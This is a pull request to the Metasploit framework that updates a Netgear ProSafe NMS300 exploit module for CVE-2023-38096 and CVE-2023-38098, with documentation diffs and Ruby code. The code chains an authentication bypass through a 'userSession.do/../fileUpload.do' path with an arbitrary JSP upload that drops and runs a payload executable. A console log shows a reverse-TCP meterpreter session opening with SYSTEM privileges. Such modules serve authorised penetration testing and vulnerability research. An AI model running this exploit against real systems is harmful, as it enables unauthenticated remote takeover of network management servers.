### PR TITLE
Add Netgear NMS RCE (CVE-2023-38096/8) exploit

### DIFF
--- a/documentation/modules/exploit/windows/http/netgear_nms_rce.md
+++ b/documentation/modules/exploit/windows/http/netgear_nms_rce.md
@@ -6,7 +6,9 @@ attacker to execute code as SYSTEM user. Vulnerabilities include authentication 
 SQL injection, arbitrary file upload, and privilege escalation across various versions.
 This module is able to spawn a meterpreter session by chaining together two specific
 vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.
-This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.
+This module has been tested with versions `1.5.0.2`, `1.4.0.17`, `1.7.0.12`, and `1.7.0.1`.
+
+Note: Module should also work against version `1.1.0.13` but it wasn't tested.
 
 ## Testing
 For installing the vulnerable version follow the steps below,

--- a/documentation/modules/exploit/windows/http/netgear_nms_rce.md
+++ b/documentation/modules/exploit/windows/http/netgear_nms_rce.md
@@ -1,0 +1,50 @@
+## Vulnerable Application
+
+Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
+The application has multiple vulnerabilities that can allow an unauthenticated remote
+attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,
+SQL injection, arbitrary file upload, and privilege escalation across various versions.
+This module is able to spawn a meterpreter session by chaining together two specific
+vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.
+This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Download the [installer](https://www.netgear.com/support/product/nms300#download) for versions below **v1.7.0.22**.
+2. Follow installation steps.
+
+After these steps the ProSAFE NMS web panel will be exposed on the `http://localhost:8080/` address.
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/windows/http/netgear_nms_rce`
+3. Do: `set RHOST [IP]`
+4. Do: `set RPORT [PORT]`
+5. Do: `check`
+
+## Options
+
+## Scenarios
+
+```
+msf6 > use exploit/windows/http/netgear_nms_rce
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/netgear_nms_rce) > set rhosts 192.168.56.104
+rhosts => 192.168.56.104
+msf6 exploit(windows/http/netgear_nms_rce) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf6 exploit(windows/http/netgear_nms_rce) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] 192.168.56.104:8080 - Uploading payload...
+[+] 192.168.56.104:8080 - Payload uploaded successfully
+[*] 192.168.56.104:8080 - Executing payload...
+[*] Sending stage (175686 bytes) to 192.168.56.104
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:50133) at 2023-08-02 22:40:21 +0200
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+
+```

--- a/documentation/modules/exploit/windows/http/netgear_nms_rce.md
+++ b/documentation/modules/exploit/windows/http/netgear_nms_rce.md
@@ -21,7 +21,7 @@ After these steps the ProSAFE NMS web panel will be exposed on the `http://local
 2. Do: `use exploit/windows/http/netgear_nms_rce`
 3. Do: `set RHOST [IP]`
 4. Do: `set RPORT [PORT]`
-5. Do: `check`
+5. Do: `exploit`
 
 ## Options
 

--- a/modules/exploits/windows/http/netgear_nms_rce.rb
+++ b/modules/exploits/windows/http/netgear_nms_rce.rb
@@ -10,75 +10,87 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::EXE
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
-      'Description' => %q{
-        Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
-        The application has a file upload vulnerability that can be exploited by an
-        unauthenticated remote attacker to execute code as the SYSTEM user.
-        Two servlets are vulnerable, FileUploadController (located at
-        /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do).
-        This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and
-        1.1.0.13.
-      },
-      'Author' =>
-        [
-          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
+    super(
+      update_info(
+        info,
+        'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
+        'Description' => %q{
+          Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
+          The application has multiple vulnerabilities that can allow an unauthenticated remote
+          attacker to execute code as SYSTEM user. Vulnerabilities include authentication bypass,
+          SQL injection, arbitrary file upload, and privilege escalation across various versions.
+          This module is able to spawn a meterpreter session by chaining together two specific
+          vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.
+          This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.
+        },
+        'Author' => [
+          'Ege BALCI <egebalci[at]pm.me>', # Msf module update for CVE-2023-38096 and CVE-2023-38098
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and updated MSF module
         ],
-      'License' => MSF_LICENSE,
-      'References' =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['ZDI', '23-920'],
+          ['ZDI', '23-918'],
+          ['CVE', '2023-38096'],
+          ['CVE', '2023-38098'],
           ['CVE', '2016-1525'],
           ['US-CERT-VU', '777024'],
           ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
-          ['URL', 'https://seclists.org/fulldisclosure/2016/Feb/30']
+          ['URL', 'https://seclists.org/fulldisclosure/2016/Feb/30'],
+          ['URL', 'https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025'],
         ],
-      'DefaultOptions' => { 'WfsDelay' => 5 },
-      'Platform' => 'win',
-      'Arch' => ARCH_X86,
-      'Privileged' => true,
-      'Targets' =>
-        [
+        'DefaultOptions' => { 'WfsDelay' => 5 },
+        'Platform' => ['win'],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
           [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
         ],
-      'DefaultTarget' => 0,
-      'DisclosureDate' => '2016-02-04'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2016-02-04',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(8080),
-        OptString.new('TARGETURI', [true,  "Application path", '/'])
-      ])
+        OptString.new('TARGETURI', [true, 'Application path', '/'])
+      ]
+    )
   end
-
 
   def check
     res = send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
-      'method' => 'GET'
+      'uri' => normalize_uri(datastore['TARGETURI'], 'userSession.do/../fileUpload.do'),
+      'method' => 'POST',
+      'vars_get' => { 'method' => 'loginHtml' } # This is required for auth bypass above v1.5.0.11
     })
-    if res && res.code == 405
+    if res && res.code == 200 # if this endpoint returns 200 than we can exploit all targets
       Exploit::CheckCode::Detected
     else
       Exploit::CheckCode::Safe
     end
   end
 
-
   def generate_jsp_payload
     exe = generate_payload_exe
     base64_exe = Rex::Text.encode_base64(exe)
-    payload_name = rand_text_alpha(rand(6)+3)
+    payload_name = rand_text_alpha(rand(3..8))
 
-    var_raw     = 'a' + rand_text_alpha(rand(8) + 3)
-    var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
-    var_buf     = 'c' + rand_text_alpha(rand(8) + 3)
-    var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
-    var_tmp     = 'e' + rand_text_alpha(rand(8) + 3)
-    var_path    = 'f' + rand_text_alpha(rand(8) + 3)
-    var_proc2   = 'e' + rand_text_alpha(rand(8) + 3)
+    var_raw = 'a' + rand_text_alpha(rand(3..10))
+    var_ostream = 'b' + rand_text_alpha(rand(3..10))
+    var_buf = 'c' + rand_text_alpha(rand(3..10))
+    var_decoder = 'd' + rand_text_alpha(rand(3..10))
+    var_tmp = 'e' + rand_text_alpha(rand(3..10))
+    var_path = 'f' + rand_text_alpha(rand(3..10))
+    var_proc2 = 'e' + rand_text_alpha(rand(3..10))
 
-    jsp = %Q|
+    jsp = %|
     <%@page import="java.io.*"%>
     <%@page import="sun.misc.BASE64Decoder"%>
     <%
@@ -105,35 +117,42 @@ class MetasploitModule < Msf::Exploit::Remote
     return jsp
   end
 
-
   def exploit
     jsp_payload = generate_jsp_payload
 
-    jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
-    jsp_full_name = "null#{jsp_name}.jsp"
+    rand_name = Rex::Text.rand_text_alpha(rand(8..15))
     post_data = Rex::MIME::Message.new
-    post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
+    post_data.add_part('topology', nil, nil, 'form-data; name="type"')
     post_data.add_part(jsp_payload,
-      "application/octet-stream", 'binary',
-      "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
+                       'application/octet-stream', 'binary',
+                       "form-data; name=\"FileData\"; filename=\"#{rand_name}.jsp\"")
     data = post_data.to_s
 
     print_status("#{peer} - Uploading payload...")
     res = send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
+      'uri' => normalize_uri(datastore['TARGETURI'], 'userSession.do/../fileUpload.do'),
       'method' => 'POST',
-      'data'   => data,
-      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'vars_get' => {
+        'method' => 'loginHtml',
+        'format' => 'jsp'
+      }
     })
-    if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
+    if res && res.code == 200 && res.get_json_document['success']
       print_good("#{peer} - Payload uploaded successfully")
     else
       fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
     end
 
+    payload_name = res.get_json_document['file']
+    if payload_name.empty?
+      fail_with(Failure::Unknown, "#{peer} - Unexpected upload response")
+    end
+
     print_status("#{peer} - Executing payload...")
     send_request_cgi({
-      'uri'    => normalize_uri(datastore['TARGETURI'], jsp_full_name),
+      'uri' => normalize_uri(datastore['TARGETURI'], "lib-1.0/external/flash/topology/map/#{payload_name}"),
       'method' => 'GET'
     })
     handler


### PR DESCRIPTION
Hello :wave:

This module exploits the newly discovered authentication bypass and arbitrary file upload vulnerabilities (CVE-2023-38096 and CVE-2023-38098) in the Netgear ProSAFE NMS300. The vulnerabilities affect all versions below **1.7.0.22**. By chaining together these vulnerabilities, an unauthenticated remote attacker can execute arbitrary code with SYSTEM privileges. Since there is already a `netgear_nms_rce` module inside the Metasploit, I have updated the existing one. The new version can exploit both the older and the newer vulnerabilities.

**ZDI Refs:**
- [CVE-2023-38096](https://www.zerodayinitiative.com/advisories/ZDI-23-920/)
- [CVE-2023-38098](https://www.zerodayinitiative.com/advisories/ZDI-23-918/)

## Testing Environment Setup
For installing the vulnerable version follow the steps below,
1. Download the [installer](https://www.netgear.com/support/product/nms300#download) for versions below **v1.7.0.22**.
2. Follow installation steps.

At the end web panel will be exposed on the `http://localhost:8080/` address.

## Verification
- [ ] Start `msfconsole`
- [ ] Do: `use exploit/windows/http/netgear_nms_rce`
- [ ] Do: `set rhost [IP]`
- [ ] Do: `check`

